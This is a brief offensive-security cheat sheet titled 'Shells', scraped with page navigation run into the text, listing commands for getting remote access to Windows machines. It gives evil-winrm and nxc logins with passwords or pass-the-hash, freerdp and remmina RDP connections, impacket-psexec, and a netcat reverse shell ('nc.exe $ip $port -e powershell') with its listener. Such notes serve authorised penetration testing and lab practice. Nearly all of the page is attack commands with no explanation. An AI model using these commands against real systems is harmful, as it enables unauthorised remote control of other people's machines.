πShells
Evil-WinRM
Test with cme
Port : 5985
RDP
freerdp
remmina
Impacket-psexec
Impacket-psexecnetcat
netcatLast updated
Impacket-psexecnetcatLast updated
nxc winrm -i IP/hostname -u $USERNAME -p $PASSWORD/-H $LM_HASHevil-winrm -i IP/hostname -u $USERNAME -H $HASH
evil-winrm -i IP/hostname -u $USERNAME -p $PASSWORDfreerdp /u:$user /p:$password /v:$ipremmina -c rdp://$user@$ipimpacket-psexec '$user:$password@$ip'
psexec.py $user:$pass@$ip# Windows
# server :
nc.exe $ip $port -e powershell
# client :
nc -lvnp $port